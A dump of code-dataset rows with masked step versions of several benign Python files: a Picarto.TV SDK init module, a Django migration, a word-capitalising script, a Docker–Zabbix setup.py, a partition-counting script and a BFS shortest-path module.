code (string, 13 to 1.2M chars) | order_type (string, 1 class: "normal") | original_example (dict) | step_ids (list, 1 to 5 items)
---|---|---|---
# coding: utf-8
"""
Picarto.TV API Documentation
The Picarto.TV API documentation Note, for fixed access tokens, the header that needs to be sent is of the format: `Authorization: Bearer yourTokenHere` This can be generated at https://oauth.picarto.tv/ For chat API, see https://docs.picarto.tv/chat/chat.proto - contact via the email below for implementation details
OpenAPI spec version: 1.2.5
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
# import models into sdk package
from .models.basic_channel_info import BasicChannelInfo
from .models.basic_follower_info import BasicFollowerInfo
from .models.basic_following_info import BasicFollowingInfo
from .models.categories import Categories
from .models.category import Category
from .models.channel_details import ChannelDetails
from .models.channel_search_results import ChannelSearchResults
from .models.channel_video import ChannelVideo
from .models.channel_videos import ChannelVideos
from .models.description_panel import DescriptionPanel
from .models.event import Event
from .models.events import Events
from .models.language import Language
from .models.languages import Languages
from .models.mobile_notify_settings import MobileNotifySettings
from .models.multi_participant import MultiParticipant
from .models.notification import Notification
from .models.notification_1 import Notification1
from .models.notifications import Notifications
from .models.online_channels import OnlineChannels
from .models.online_details import OnlineDetails
from .models.online_notify_settings import OnlineNotifySettings
from .models.thumbnail import Thumbnail
from .models.user_data import UserData
from .models.user_email_settings import UserEmailSettings
from .models.video_search_result import VideoSearchResult
from .models.video_search_results import VideoSearchResults
from .models.webhook import Webhook
# import apis into sdk package
from .apis.bot_api import BotApi
from .apis.channel_api import ChannelApi
from .apis.multistream_api import MultistreamApi
from .apis.public_api import PublicApi
from .apis.sensitive_api import SensitiveApi
from .apis.user_api import UserApi
from .apis.webhook_api import WebhookApi
# import ApiClient
from .api_client import ApiClient
from .configuration import Configuration
configuration = Configuration()
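
A minimal usage sketch, not part of the generated package: the module docstring above notes that a fixed access token is sent as an `Authorization: Bearer <token>` header. Using plain `requests` (the endpoint path below is a placeholder chosen for illustration, not taken from the SDK):

import requests

def fetch_with_token(token):
    # Hypothetical endpoint; the point is the Bearer header described in the docstring above.
    resp = requests.get(
        "https://api.picarto.tv/v1/online",
        headers={"Authorization": "Bearer " + token},
        timeout=10,
    )
    resp.raise_for_status()
    return resp.json()

With the generated client itself, the usual flow is to adjust the `configuration` object above and then build one of the API classes (e.g. `PublicApi`) on top of an `ApiClient`; the exact constructor signatures depend on the swagger-codegen version.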
|
normal
|
{
"blob_id": "939011fca968d5f9250beb29a0bb700200e637df",
"index": 6274,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nconfiguration = Configuration()\n",
"step-3": "<mask token>\nfrom __future__ import absolute_import\nfrom .models.basic_channel_info import BasicChannelInfo\nfrom .models.basic_follower_info import BasicFollowerInfo\nfrom .models.basic_following_info import BasicFollowingInfo\nfrom .models.categories import Categories\nfrom .models.category import Category\nfrom .models.channel_details import ChannelDetails\nfrom .models.channel_search_results import ChannelSearchResults\nfrom .models.channel_video import ChannelVideo\nfrom .models.channel_videos import ChannelVideos\nfrom .models.description_panel import DescriptionPanel\nfrom .models.event import Event\nfrom .models.events import Events\nfrom .models.language import Language\nfrom .models.languages import Languages\nfrom .models.mobile_notify_settings import MobileNotifySettings\nfrom .models.multi_participant import MultiParticipant\nfrom .models.notification import Notification\nfrom .models.notification_1 import Notification1\nfrom .models.notifications import Notifications\nfrom .models.online_channels import OnlineChannels\nfrom .models.online_details import OnlineDetails\nfrom .models.online_notify_settings import OnlineNotifySettings\nfrom .models.thumbnail import Thumbnail\nfrom .models.user_data import UserData\nfrom .models.user_email_settings import UserEmailSettings\nfrom .models.video_search_result import VideoSearchResult\nfrom .models.video_search_results import VideoSearchResults\nfrom .models.webhook import Webhook\nfrom .apis.bot_api import BotApi\nfrom .apis.channel_api import ChannelApi\nfrom .apis.multistream_api import MultistreamApi\nfrom .apis.public_api import PublicApi\nfrom .apis.sensitive_api import SensitiveApi\nfrom .apis.user_api import UserApi\nfrom .apis.webhook_api import WebhookApi\nfrom .api_client import ApiClient\nfrom .configuration import Configuration\nconfiguration = Configuration()\n",
"step-4": "# coding: utf-8\n\n\"\"\"\n Picarto.TV API Documentation\n\n The Picarto.TV API documentation Note, for fixed access tokens, the header that needs to be sent is of the format: `Authorization: Bearer yourTokenHere` This can be generated at https://oauth.picarto.tv/ For chat API, see https://docs.picarto.tv/chat/chat.proto - contact via the email below for implementation details \n\n OpenAPI spec version: 1.2.5\n Contact: [email protected]\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nfrom __future__ import absolute_import\n\n# import models into sdk package\nfrom .models.basic_channel_info import BasicChannelInfo\nfrom .models.basic_follower_info import BasicFollowerInfo\nfrom .models.basic_following_info import BasicFollowingInfo\nfrom .models.categories import Categories\nfrom .models.category import Category\nfrom .models.channel_details import ChannelDetails\nfrom .models.channel_search_results import ChannelSearchResults\nfrom .models.channel_video import ChannelVideo\nfrom .models.channel_videos import ChannelVideos\nfrom .models.description_panel import DescriptionPanel\nfrom .models.event import Event\nfrom .models.events import Events\nfrom .models.language import Language\nfrom .models.languages import Languages\nfrom .models.mobile_notify_settings import MobileNotifySettings\nfrom .models.multi_participant import MultiParticipant\nfrom .models.notification import Notification\nfrom .models.notification_1 import Notification1\nfrom .models.notifications import Notifications\nfrom .models.online_channels import OnlineChannels\nfrom .models.online_details import OnlineDetails\nfrom .models.online_notify_settings import OnlineNotifySettings\nfrom .models.thumbnail import Thumbnail\nfrom .models.user_data import UserData\nfrom .models.user_email_settings import UserEmailSettings\nfrom .models.video_search_result import VideoSearchResult\nfrom .models.video_search_results import VideoSearchResults\nfrom .models.webhook import Webhook\n\n# import apis into sdk package\nfrom .apis.bot_api import BotApi\nfrom .apis.channel_api import ChannelApi\nfrom .apis.multistream_api import MultistreamApi\nfrom .apis.public_api import PublicApi\nfrom .apis.sensitive_api import SensitiveApi\nfrom .apis.user_api import UserApi\nfrom .apis.webhook_api import WebhookApi\n\n# import ApiClient\nfrom .api_client import ApiClient\n\nfrom .configuration import Configuration\n\nconfiguration = Configuration()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# Generated by Django 3.2.5 on 2021-08-05 07:19
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('organization', '0010_auto_20210801_1623'),
('quote', '0004_auto_20210805_1032'),
]
operations = [
migrations.CreateModel(
name='FollowUp',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('timestamp', models.DateTimeField(auto_now_add=True, verbose_name='تاریخ ثبت')),
('text', models.TextField(default=None, verbose_name='متن پیگیری')),
('creator', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='کاربر ثبت کننده')),
('organization', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='organization.organization', verbose_name='سازمان')),
],
),
]
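
For reference, the `CreateModel` operation above corresponds to a model roughly like the sketch below. This is reconstructed from the migration fields, not taken from the project; the model class name `Organization` and the app layout are assumptions. The Persian verbose_name strings translate to: 'تاریخ ثبت' = "registration date", 'متن پیگیری' = "follow-up text", 'کاربر ثبت کننده' = "registering user", 'سازمان' = "organization".

from django.conf import settings
from django.db import models


class FollowUp(models.Model):
    # Fields mirror the migration above; the BigAutoField 'id' typically comes from DEFAULT_AUTO_FIELD.
    timestamp = models.DateTimeField(auto_now_add=True, verbose_name='تاریخ ثبت')
    text = models.TextField(default=None, verbose_name='متن پیگیری')
    creator = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE,
                                verbose_name='کاربر ثبت کننده')
    organization = models.ForeignKey('organization.Organization', on_delete=models.CASCADE,
                                     verbose_name='سازمان')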
|
normal
|
{
"blob_id": "f2c53efa4b7c2df592582e3093ff269b703be1e0",
"index": 3054,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [migrations.swappable_dependency(settings.\n AUTH_USER_MODEL), ('organization', '0010_auto_20210801_1623'), (\n 'quote', '0004_auto_20210805_1032')]\n operations = [migrations.CreateModel(name='FollowUp', fields=[('id',\n models.BigAutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('timestamp', models.DateTimeField(\n auto_now_add=True, verbose_name='تاریخ ثبت')), ('text', models.\n TextField(default=None, verbose_name='متن پیگیری')), ('creator',\n models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=\n settings.AUTH_USER_MODEL, verbose_name='کاربر ثبت کننده')), (\n 'organization', models.ForeignKey(on_delete=django.db.models.\n deletion.CASCADE, to='organization.organization', verbose_name=\n 'سازمان'))])]\n",
"step-4": "from django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n dependencies = [migrations.swappable_dependency(settings.\n AUTH_USER_MODEL), ('organization', '0010_auto_20210801_1623'), (\n 'quote', '0004_auto_20210805_1032')]\n operations = [migrations.CreateModel(name='FollowUp', fields=[('id',\n models.BigAutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('timestamp', models.DateTimeField(\n auto_now_add=True, verbose_name='تاریخ ثبت')), ('text', models.\n TextField(default=None, verbose_name='متن پیگیری')), ('creator',\n models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=\n settings.AUTH_USER_MODEL, verbose_name='کاربر ثبت کننده')), (\n 'organization', models.ForeignKey(on_delete=django.db.models.\n deletion.CASCADE, to='organization.organization', verbose_name=\n 'سازمان'))])]\n",
"step-5": "# Generated by Django 3.2.5 on 2021-08-05 07:19\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('organization', '0010_auto_20210801_1623'),\n ('quote', '0004_auto_20210805_1032'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='FollowUp',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('timestamp', models.DateTimeField(auto_now_add=True, verbose_name='تاریخ ثبت')),\n ('text', models.TextField(default=None, verbose_name='متن پیگیری')),\n ('creator', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='کاربر ثبت کننده')),\n ('organization', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='organization.organization', verbose_name='سازمان')),\n ],\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import sys
word = input()
if word[0].islower():
print('{}{}'.format(word[0].upper(), word[1:]))
sys.exit()
else:
print(word)
sys.exit()
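
The script above reads one word from stdin and upper-cases its first letter if it is lower case (the explicit `sys.exit()` calls are redundant, since the script ends either way). The same transformation as a reusable, testable function:

def capitalize_first(word):
    # Mirrors the script above; also tolerates an empty string, which the raw script does not.
    return word[0].upper() + word[1:] if word and word[0].islower() else word

assert capitalize_first("apple") == "Apple"
assert capitalize_first("Apple") == "Apple"
assert capitalize_first("") == ""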
|
normal
|
{
"blob_id": "227e78312b5bad85df562b6ba360de352c305e7b",
"index": 3913,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif word[0].islower():\n print('{}{}'.format(word[0].upper(), word[1:]))\n sys.exit()\nelse:\n print(word)\n sys.exit()\n",
"step-3": "<mask token>\nword = input()\nif word[0].islower():\n print('{}{}'.format(word[0].upper(), word[1:]))\n sys.exit()\nelse:\n print(word)\n sys.exit()\n",
"step-4": "import sys\nword = input()\nif word[0].islower():\n print('{}{}'.format(word[0].upper(), word[1:]))\n sys.exit()\nelse:\n print(word)\n sys.exit()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/env python
import os
import sys
from setuptools import setup
from textwrap import dedent
NAME = "docker-zabbix-script-sender"
GITHUB_ORG_URL = "https://github.com/troptop/"
ROOT_DIR = os.path.dirname(__file__)
SOURCE_DIR = os.path.join(ROOT_DIR)
exec(open('docker_zabbix_script_sender/version.py').read())
setup(
name=NAME,
version=version,
author="Cyril Moreau",
author_email="[email protected]",
url= GITHUB_ORG_URL + '/' + NAME,
download_url="{0}/{1}/tarball/v{2}".format(GITHUB_ORG_URL, NAME, version),
description="Push Docker containers script results to Zabbix efficiently",
long_description=dedent("""
Rationale
---------
Docker Zabbix Sender delivers a daemon script that pushes Docker container statistics to Zabbix.
It leverages 3 interesting components:
- Zabbix maintains a tool titled ``zabbix-sender``.
It is meant to push `Zabbix trapper items`_ efficiently.
- Develop your own scripts to monitor your docker container
- Docker 1.5.0 comes with Docker Remote API version 17, providing a new `stats endpoint`_.
It allows the client to subscribe to a live feed delivering container statistics.
The daemon script stands in the middle of those 3 components.
It collects Docker container statistics and transforms them into Zabbix trapper events.
Published metrics
-----------------
The daemon script does not publish any statistic yet.
You have to develop your own script
Documentation
-------------
The stable documentation is available on ReadTheDocs_
"""),
keywords="docker zabbix monitoring",
packages=['docker_zabbix_script_sender'],
install_requires=[
'docker-py >= 1.0.0',
],
zip_safe=False,
license="Apache license version 2.0",
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Other Environment',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Utilities',
'License :: OSI Approved :: Apache Software License',
],
entry_points = """
[console_scripts]
docker-zabbix-script-sender = docker_zabbix_script_sender.zabbix_sender:run
"""
)
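
The `exec(open('docker_zabbix_script_sender/version.py').read())` call above only works if that file binds a `version` name at module level; a hypothetical, minimal `version.py` compatible with this setup script is shown below (the value is a placeholder). The `console_scripts` entry point then installs a `docker-zabbix-script-sender` command wired to `docker_zabbix_script_sender.zabbix_sender:run`.

# docker_zabbix_script_sender/version.py -- hypothetical contents
version = "1.0.0"  # exec() in setup.py binds this name before setup(...) is called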
|
normal
|
{
"blob_id": "0769003c248c099da5bcd75541d35234b01af5de",
"index": 2723,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nexec(open('docker_zabbix_script_sender/version.py').read())\nsetup(name=NAME, version=version, author='Cyril Moreau', author_email=\n '[email protected]', url=GITHUB_ORG_URL + '/' + NAME,\n download_url='{0}/{1}/tarball/v{2}'.format(GITHUB_ORG_URL, NAME,\n version), description=\n 'Push Docker containers script results to Zabbix efficiently',\n long_description=dedent(\n \"\"\"\n Rationale\n ---------\n Docker Zabbix Sender delivers a daemon script that push to Zabbix statistics about Docker containers.\n\n It leverages 3 interesting components:\n\n - Zabbix maintains a tool titled ``zabbix-sender``.\n It is meant to push `Zabbix trapper items`_ efficiently.\n\n\t- Develop your own scripts to monitor your docker container\n\n - Docker 1.5.0 comes with Docker Remote API version 17, providing a new `stats endpoint`_.\n It allows the client to subscribe to a live feed delivering a container statistics.\n\n The daemon script stands in the middle of those 3 components.\n It collects Docker containers statistics and transforms them in Zabbix trapper events.\n\n Published metrics\n -----------------\n The daemon script does not publish any statistic yet.\n\tYou have to develop your own script\n\n Documentation\n -------------\n The stable documentation is available on ReadTheDocs_\n\n \"\"\"\n ), keywords='docker zabbix monitoring', packages=[\n 'docker_zabbix_script_sender'], install_requires=['docker-py >= 1.0.0'],\n zip_safe=False, license='Apache license version 2.0', classifiers=[\n 'Development Status :: 4 - Beta', 'Environment :: Other Environment',\n 'Intended Audience :: Developers', 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.2',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4', 'Topic :: Utilities',\n 'License :: OSI Approved :: Apache Software License'], entry_points=\n \"\"\"\n [console_scripts]\n docker-zabbix-script-sender = docker_zabbix_script_sender.zabbix_sender:run\n \"\"\"\n )\n",
"step-3": "<mask token>\nNAME = 'docker-zabbix-script-sender'\nGITHUB_ORG_URL = 'https://github.com/troptop/'\nROOT_DIR = os.path.dirname(__file__)\nSOURCE_DIR = os.path.join(ROOT_DIR)\nexec(open('docker_zabbix_script_sender/version.py').read())\nsetup(name=NAME, version=version, author='Cyril Moreau', author_email=\n '[email protected]', url=GITHUB_ORG_URL + '/' + NAME,\n download_url='{0}/{1}/tarball/v{2}'.format(GITHUB_ORG_URL, NAME,\n version), description=\n 'Push Docker containers script results to Zabbix efficiently',\n long_description=dedent(\n \"\"\"\n Rationale\n ---------\n Docker Zabbix Sender delivers a daemon script that push to Zabbix statistics about Docker containers.\n\n It leverages 3 interesting components:\n\n - Zabbix maintains a tool titled ``zabbix-sender``.\n It is meant to push `Zabbix trapper items`_ efficiently.\n\n\t- Develop your own scripts to monitor your docker container\n\n - Docker 1.5.0 comes with Docker Remote API version 17, providing a new `stats endpoint`_.\n It allows the client to subscribe to a live feed delivering a container statistics.\n\n The daemon script stands in the middle of those 3 components.\n It collects Docker containers statistics and transforms them in Zabbix trapper events.\n\n Published metrics\n -----------------\n The daemon script does not publish any statistic yet.\n\tYou have to develop your own script\n\n Documentation\n -------------\n The stable documentation is available on ReadTheDocs_\n\n \"\"\"\n ), keywords='docker zabbix monitoring', packages=[\n 'docker_zabbix_script_sender'], install_requires=['docker-py >= 1.0.0'],\n zip_safe=False, license='Apache license version 2.0', classifiers=[\n 'Development Status :: 4 - Beta', 'Environment :: Other Environment',\n 'Intended Audience :: Developers', 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.2',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4', 'Topic :: Utilities',\n 'License :: OSI Approved :: Apache Software License'], entry_points=\n \"\"\"\n [console_scripts]\n docker-zabbix-script-sender = docker_zabbix_script_sender.zabbix_sender:run\n \"\"\"\n )\n",
"step-4": "import os\nimport sys\nfrom setuptools import setup\nfrom textwrap import dedent\nNAME = 'docker-zabbix-script-sender'\nGITHUB_ORG_URL = 'https://github.com/troptop/'\nROOT_DIR = os.path.dirname(__file__)\nSOURCE_DIR = os.path.join(ROOT_DIR)\nexec(open('docker_zabbix_script_sender/version.py').read())\nsetup(name=NAME, version=version, author='Cyril Moreau', author_email=\n '[email protected]', url=GITHUB_ORG_URL + '/' + NAME,\n download_url='{0}/{1}/tarball/v{2}'.format(GITHUB_ORG_URL, NAME,\n version), description=\n 'Push Docker containers script results to Zabbix efficiently',\n long_description=dedent(\n \"\"\"\n Rationale\n ---------\n Docker Zabbix Sender delivers a daemon script that push to Zabbix statistics about Docker containers.\n\n It leverages 3 interesting components:\n\n - Zabbix maintains a tool titled ``zabbix-sender``.\n It is meant to push `Zabbix trapper items`_ efficiently.\n\n\t- Develop your own scripts to monitor your docker container\n\n - Docker 1.5.0 comes with Docker Remote API version 17, providing a new `stats endpoint`_.\n It allows the client to subscribe to a live feed delivering a container statistics.\n\n The daemon script stands in the middle of those 3 components.\n It collects Docker containers statistics and transforms them in Zabbix trapper events.\n\n Published metrics\n -----------------\n The daemon script does not publish any statistic yet.\n\tYou have to develop your own script\n\n Documentation\n -------------\n The stable documentation is available on ReadTheDocs_\n\n \"\"\"\n ), keywords='docker zabbix monitoring', packages=[\n 'docker_zabbix_script_sender'], install_requires=['docker-py >= 1.0.0'],\n zip_safe=False, license='Apache license version 2.0', classifiers=[\n 'Development Status :: 4 - Beta', 'Environment :: Other Environment',\n 'Intended Audience :: Developers', 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.2',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4', 'Topic :: Utilities',\n 'License :: OSI Approved :: Apache Software License'], entry_points=\n \"\"\"\n [console_scripts]\n docker-zabbix-script-sender = docker_zabbix_script_sender.zabbix_sender:run\n \"\"\"\n )\n",
"step-5": "#!/usr/bin/env python\nimport os\nimport sys\nfrom setuptools import setup\nfrom textwrap import dedent\n\nNAME = \"docker-zabbix-script-sender\"\nGITHUB_ORG_URL = \"https://github.com/troptop/\"\nROOT_DIR = os.path.dirname(__file__)\nSOURCE_DIR = os.path.join(ROOT_DIR)\n\nexec(open('docker_zabbix_script_sender/version.py').read())\n\nsetup(\n name=NAME,\n version=version,\n author=\"Cyril Moreau\",\n author_email=\"[email protected]\",\n url= GITHUB_ORG_URL + '/' + NAME,\n download_url=\"{0}/{1}/tarball/v{2}\".format(GITHUB_ORG_URL, NAME, version),\n description=\"Push Docker containers script results to Zabbix efficiently\",\n long_description=dedent(\"\"\"\n Rationale\n ---------\n Docker Zabbix Sender delivers a daemon script that push to Zabbix statistics about Docker containers.\n\n It leverages 3 interesting components:\n\n - Zabbix maintains a tool titled ``zabbix-sender``.\n It is meant to push `Zabbix trapper items`_ efficiently.\n\n\t- Develop your own scripts to monitor your docker container\n\n - Docker 1.5.0 comes with Docker Remote API version 17, providing a new `stats endpoint`_.\n It allows the client to subscribe to a live feed delivering a container statistics.\n\n The daemon script stands in the middle of those 3 components.\n It collects Docker containers statistics and transforms them in Zabbix trapper events.\n\n Published metrics\n -----------------\n The daemon script does not publish any statistic yet.\n\tYou have to develop your own script\n\n Documentation\n -------------\n The stable documentation is available on ReadTheDocs_\n\n \"\"\"),\n keywords=\"docker zabbix monitoring\",\n packages=['docker_zabbix_script_sender'],\n install_requires=[\n 'docker-py >= 1.0.0',\n ],\n zip_safe=False,\n license=\"Apache license version 2.0\",\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Other Environment',\n 'Intended Audience :: Developers',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.2',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4',\n 'Topic :: Utilities',\n 'License :: OSI Approved :: Apache Software License',\n ],\n entry_points = \"\"\"\n [console_scripts]\n docker-zabbix-script-sender = docker_zabbix_script_sender.zabbix_sender:run\n \"\"\"\n)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#Title: Counting summations
import math
limit = 201
comboList = dict()
alphabet = range(1, limit)
searchAlphabet = set(alphabet)
def concat(a, b):
return "%i %i" % (a, b)
def split(n, min=1, tab=6):
if concat(n,min) in comboList.keys():
if tab == 6:
print " %sn = %i, min = %i, %i" % (" "*tab, n, min, concat(n, min))
return comboList[concat(n,min)]
if int(n) < int(min + 1):
return 1
splitSum = 0
splitList = []
for i in range(len(alphabet)):
if alphabet[i] > n/2:
break
if (n - alphabet[i]) in alphabet and not alphabet[i] < min:
splitSum += split(n - alphabet[i], alphabet[i], tab - 1)
comboList[concat(n,min)] = splitSum + 1
return splitSum + 1
#print split(99) -1
#print split(100) -1
splits = []
for i in range(limit):
splits.append(split(i) - 1)
print "%i: %i" % (i, splits[i])
|
normal
|
{
"blob_id": "618a8430d50aeca1c4b9c3fba975be342cc1893f",
"index": 6348,
"step-1": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#Title: Counting summations\n\nimport math\n\nlimit = 201\ncomboList = dict()\nalphabet = range(1, limit)\nsearchAlphabet = set(alphabet)\ndef concat(a, b):\n\treturn \"%i %i\" % (a, b)\n\ndef split(n, min=1, tab=6):\n\tif concat(n,min) in comboList.keys():\n\t\tif tab == 6:\n\t\t\tprint \" %sn = %i, min = %i, %i\" % (\"\t\"*tab, n, min, concat(n, min))\n\t\treturn comboList[concat(n,min)]\n\tif int(n) < int(min + 1):\n\t\treturn 1\n\tsplitSum = 0\n\tsplitList = []\n\tfor i in range(len(alphabet)):\n\t\tif alphabet[i] > n/2:\n\t\t\tbreak\n\t\tif (n - alphabet[i]) in alphabet and not alphabet[i] < min:\n\t\t\tsplitSum += split(n - alphabet[i], alphabet[i], tab - 1)\n\tcomboList[concat(n,min)] = splitSum + 1\n\treturn splitSum + 1\n\n#print split(99) -1\n#print split(100) -1\nsplits = []\nfor i in range(limit):\n\tsplits.append(split(i) - 1)\n\tprint \"%i: %i\" % (i, splits[i])\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from Graph import create_random_graph
def find_accessible_vertices_backwards(graph, end_vertex):
if end_vertex not in graph.parse_vertices():
raise ValueError("The end vertex is not in the graph.")
visited = []
queue = []
next_vertex = {}
distance_to_end = {}
queue.append(end_vertex)
visited.append(end_vertex)
distance_to_end[end_vertex] = 0
while len(queue) > 0:
y = queue[0]
queue = queue[1:]
for edge in graph.parse_inbound_edges(y):
if edge.source_id not in visited:
visited.append(edge.source_id)
queue.append(edge.source_id)
distance_to_end[edge.source_id] = distance_to_end[y] + 1
next_vertex[edge.source_id] = y
return next_vertex
def find_minimum_length_path(graph, start_vertex, end_vertex):
next_vertex = find_accessible_vertices_backwards(graph, end_vertex)
if start_vertex not in next_vertex.keys():
raise ValueError("There is no path from " + str(start_vertex) + " to " + str(end_vertex))
path = [start_vertex]
last_vertex = start_vertex
reached_end = False
while not reached_end:
path.append(next_vertex[last_vertex])
last_vertex = next_vertex[last_vertex]
if path[-1] == end_vertex:
reached_end = True
return path
def main():
random_graph = create_random_graph(5, 10)
print("THE GRAPH:")
for vertex in random_graph.parse_vertices():
for edge in random_graph.parse_outbound_edges(vertex):
print(edge)
print("\n")
next_vertex = find_accessible_vertices_backwards(random_graph, 1)
print(next_vertex.keys())
print("\n")
path = find_minimum_length_path(random_graph, 1, 4)
print(path)
main()
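
The functions above depend on a `Graph` class from the accompanying `Graph` module, which is not shown here. The underlying idea, a backwards BFS from the end vertex that records each vertex's next hop towards the end, can be sketched standalone on a plain adjacency-list dict; this is an independent illustration, not the project's `Graph` API.

from collections import deque

def shortest_path(adj, start, end):
    """adj maps vertex -> list of vertices it has directed edges to."""
    # Build reversed adjacency, then BFS backwards from `end`, recording next hops toward it.
    reverse = {v: [] for v in adj}
    for u, outs in adj.items():
        for v in outs:
            reverse.setdefault(v, []).append(u)
    next_hop, seen, queue = {}, {end}, deque([end])
    while queue:
        y = queue.popleft()
        for u in reverse.get(y, []):
            if u not in seen:
                seen.add(u)
                next_hop[u] = y
                queue.append(u)
    if start != end and start not in next_hop:
        raise ValueError("no path from {} to {}".format(start, end))
    path, v = [start], start
    while v != end:
        v = next_hop[v]
        path.append(v)
    return path

print(shortest_path({0: [1, 2], 1: [3], 2: [3], 3: []}, 0, 3))  # -> [0, 1, 3]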
|
normal
|
{
"blob_id": "f882589729d74a910d20856d4dc02546fe316e0d",
"index": 2994,
"step-1": "<mask token>\n\n\ndef main():\n random_graph = create_random_graph(5, 10)\n print('THE GRAPH:')\n for vertex in random_graph.parse_vertices():\n for edge in random_graph.parse_outbound_edges(vertex):\n print(edge)\n print('\\n')\n next_vertex = find_accessible_vertices_backwards(random_graph, 1)\n print(next_vertex.keys())\n print('\\n')\n path = find_minimum_length_path(random_graph, 1, 4)\n print(path)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef find_minimum_length_path(graph, start_vertex, end_vertex):\n next_vertex = find_accessible_vertices_backwards(graph, end_vertex)\n if start_vertex not in next_vertex.keys():\n raise ValueError('There is no path from ' + str(start_vertex) +\n ' to ' + str(end_vertex))\n path = [start_vertex]\n last_vertex = start_vertex\n reached_end = False\n while not reached_end:\n path.append(next_vertex[last_vertex])\n last_vertex = next_vertex[last_vertex]\n if path[-1] == end_vertex:\n reached_end = True\n return path\n\n\ndef main():\n random_graph = create_random_graph(5, 10)\n print('THE GRAPH:')\n for vertex in random_graph.parse_vertices():\n for edge in random_graph.parse_outbound_edges(vertex):\n print(edge)\n print('\\n')\n next_vertex = find_accessible_vertices_backwards(random_graph, 1)\n print(next_vertex.keys())\n print('\\n')\n path = find_minimum_length_path(random_graph, 1, 4)\n print(path)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef find_accessible_vertices_backwards(graph, end_vertex):\n if end_vertex not in graph.parse_vertices():\n raise ValueError('The end vertex is not in the graph.')\n visited = []\n queue = []\n next_vertex = {}\n distance_to_end = {}\n queue.append(end_vertex)\n visited.append(end_vertex)\n distance_to_end[end_vertex] = 0\n while len(queue) > 0:\n y = queue[0]\n queue = queue[1:]\n for edge in graph.parse_inbound_edges(y):\n if edge.source_id not in visited:\n visited.append(edge.source_id)\n queue.append(edge.source_id)\n distance_to_end[edge.source_id] = distance_to_end[y] + 1\n next_vertex[edge.source_id] = y\n return next_vertex\n\n\ndef find_minimum_length_path(graph, start_vertex, end_vertex):\n next_vertex = find_accessible_vertices_backwards(graph, end_vertex)\n if start_vertex not in next_vertex.keys():\n raise ValueError('There is no path from ' + str(start_vertex) +\n ' to ' + str(end_vertex))\n path = [start_vertex]\n last_vertex = start_vertex\n reached_end = False\n while not reached_end:\n path.append(next_vertex[last_vertex])\n last_vertex = next_vertex[last_vertex]\n if path[-1] == end_vertex:\n reached_end = True\n return path\n\n\ndef main():\n random_graph = create_random_graph(5, 10)\n print('THE GRAPH:')\n for vertex in random_graph.parse_vertices():\n for edge in random_graph.parse_outbound_edges(vertex):\n print(edge)\n print('\\n')\n next_vertex = find_accessible_vertices_backwards(random_graph, 1)\n print(next_vertex.keys())\n print('\\n')\n path = find_minimum_length_path(random_graph, 